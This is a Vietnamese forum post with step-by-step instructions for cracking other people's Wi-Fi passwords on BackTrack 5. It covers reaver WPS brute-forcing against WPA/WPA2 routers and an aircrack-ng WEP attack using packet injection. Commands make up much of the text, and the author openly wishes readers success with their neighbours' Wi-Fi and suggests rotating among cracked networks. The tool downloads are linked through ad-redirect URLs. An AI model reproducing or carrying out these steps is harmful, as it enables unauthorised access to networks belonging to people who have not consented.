hack wifi WPA2 va WPA bằng phương pháp Brutal Attack với BACKTRACK 5R1

Chào các bạn, mình đã onl trên nhiều diễn đàn và thấy các bạn thường đặt câu hỏi về vấn đề hack password wifi !!! Nhưng đa số các diễn đàn đều hướng dẫn hack bằng phương pháp Dictionary Attack !! Nhưng theo mình phương pháp này có rất nhiều hạn chế:
Thứ nhất: để kiếm ra được một cái từ điển để xài là cả một vấn đề 
Thứ hai : Phần trăm thành công phụ thuộc vào may mắn rất nhiều vì password phài có trong từ điển mới hack được nếu không có thì chịu :(

Sau đây mình xin đưa ra phương pháp Brutal Attack sử dụng reaver 1.4 trong phiên bản back track 5 R1
Trước tiên các bạn download back track 5 R1 tai đây :http://adf.ly/LqEY4
các bạn nên chọn file iso ( download bằng torrent thì tốc độ nhanh hơn )
Sau khi dowload xong thì các bạn hãy tạo boot tren usb or DVD, xem hướng dẫn chi tiết tại đây :http://adf.ly/LqEfs

Ta tiến hành ***** qua 4 bước:

Bước 1 : cắm usb or DVD mà bạn đã tạo file boot vào bắt đầu. Trong quá trình back track sẽ hỏi bạn muốn chọn chế độ boot nào các bạn hãy chon :BackTrack Text - Default Boot Text Mode

Bước 2 : cài reaver 
reaver không có sẳn mà bạn phải tự update và cài đặt: 
Các bạn hãy kết nối internet để có thể update và cài reaver
Rồi bạn click vào Terminal có trên thanh menu bar Or chọn Applications > Accessories > Terminal
Sau đó các bạn gõ lệnh : apt-get update
ngồi đợi update chừng 5 phút, sau đó gõ lệnh : apt-get install reaver
nếu mọi việc diễn ra tốt đẹp thì chúng ta hãy qua bước kế tiếp.

Bước 3 : chuyển chế độ card mạng để chuẩn bị hack 
Các bạn hãy gõ lệnh : " iwconfig " để tìm tên của card mạng .Nhưng đa số các card mạng latop đều tên là "wlan0"
sau đó hãy chuyển card mạng của bạn qua chế độ monitor mode bẳng lệnh : " airmon-ng start wlan0 "
khi bạn thấy trên màng hình hiện lên : monitor mode is enable on mon0 là thành công.

Tìm BSSID của moderm mà bạn muốn tấn công bằng lệnh : "airodump-ng wlan0" nếu không được hãy thử "airodump-ng mon0"
khi đã tìm thấy BSSID của moderm mà bạn muốn hack thì bấm CTRL+C để stop 

Bước 4 : tiến hành ***** : 
gõ lệnh : reaver -i mon0 -b BSSID -vv ( BSSID của moderm mà bạn muốn hack )
vd : "reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv"
sau đó hãy ngồi đợi và khi thành công thì màn hình của bạn sẽ báo : " key *****ed in...... seconds " và dòng WPA-PSK chính là password 

lưu ý : thời gian ***** phụ thuôc vào cấu hình máy tính của bạn mức độ sóng ! các bạn nên ***** những wifi có sóng khoảng 50% trở lên thì reaver mới làm việc tốt và hiêu quả . Cách trên có thể ***** được cả WPA2 và WPA. Mình đã ***** thành công password (WPA2) 11 kí tự với mức sóng 54% , trên latop ACER ASPIRE 5575G với thời gian là 8 tiếng chạy liên tục
Trong quá trình chạy có thể phát sinh lỗi các bạn hãy lên http://adf.ly/LqEoS để hỏi và tham khảo. Mình làm biến nêu ra :))
Bài viết trên mang tính chất tham khảo và chia sẽ kiến thức cũng như kinh nghiệm mà mình đã tham khảo trên trên mạng. Hãy thanks nếu các bạn thấy có ít !! và nếu có sao chép để chia sẻ thì nhớ ghi rõ nguồn nha :)) 
chúc các bạn thành công với wifi hàng xóm
Đây cũng là bài cuối cùng mình viết về hack wifi 
cảm ơn các bạn

Hack Wifi WEP chỉ 5-10' với BACKTRACK

Download Backtrack 5

http://adf.ly/LqEY4

Nên cài backtrack vào đĩa, hoặc bạn có thể boot từ USB ,tạo USB boot bằng 
unetbootin-windows:

UNetbootin - Homepage and Downloads

Tài liệu hướng dẫn chi tiết (bạn nào chưa đọc tài liệu, mới xem video hướng dẫn 
đã làm được thì xin bái phục)Fshare - Dịch vụ chia sẻ, lưu trữ dữ liệu miễn phí tốt nhất

Video hướng dẫn: [YOUTUBE]uZ5nwjnZVoc[/YOUTUBE]
Hãy đọc kĩ tài liệu và làm theo Video là 100%, mình sẽ hướng dẫn chỗ quan trọng.
Card wireless khuyên dùng là Atheros hoặc cỏ thể là Reaktel
Các lệnh thực hiện trong video:
1.airmon-ng
2.airmon-ng start wlan0
3.airodump-ng mon0
4.airodump-ng -c (channel) -w wep --bssid () mon0
5.aireplay-ng -1 0 -a (bssid) mon0
6.aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff:ff -b (bssid) mon0 (cái này mới hay nè, 
tốc độ tăng data rất nhanh)
7.air*****-ng wep-01.cap hoặc air*****-ng -n 64 -b (bssid) wep-01.cap

Mở Shell bằng ô vuông (tô màu vàng)



Sau bước này bấm CTRL+C để quay về dấu nháy

Sử dụng lệnh airodump-ng

Mở thêm Shell, tiến hành lệnh aireplay-ng



Mở thêm shell mới tiến hành air*****-ng, như vậy có 3 shell



Lời khuyên:
1. bạn nên đợi Data khoảng 70000 hãy dùng lệnh air*****-ng
2. hãy bấm Ctrl C để dừng lệnh aireplay-ng (dừng bắt tín hiệu) trước khi tiến hành 
air*****-ng, như vậy khi dò key sẽ ko bị giật. Nếu chưa đủ Data, chỉ cần bấm Y là 
aireplay-ng sẽ chạy tiếp và ta đợi Data cao hơn
2. đừng sử dụng Wifi chùa khủng khiếp quá kẻo bị đổi pass hay bị limit access 
3. hack nhiều wifi WEP thay nhau xài.



Lời cuối:
Đã có nhiều bài hướng dẫn cách hack Wifi Wep nhưng mất rất nhiều thời gian đợi do 
tốc độ tăng Data chậm.Với cách hack Wifi trên, tốc độ tăng Data cực nhanh, 200000 
chỉ trong 5-10' .
Mình đã hack nhiều Wifi WEP,nhanh hay chậm thì tùy thuộc vào độ dài và khó của pass, 
nhưng tâm lí chung của người đặt mật khẩu là dễ nhớ, hay có chữ cái a,b,c.. và có thể 
có thêm chữ số 1,2,3.. điều này khiến chúng ta hack dễ dàng hơn. Tuy nhiên nếu không
 may gặp phải người nào hiểm, đặt pass dài và thâm kiểu @,#,*,.. thì ráng chịu:D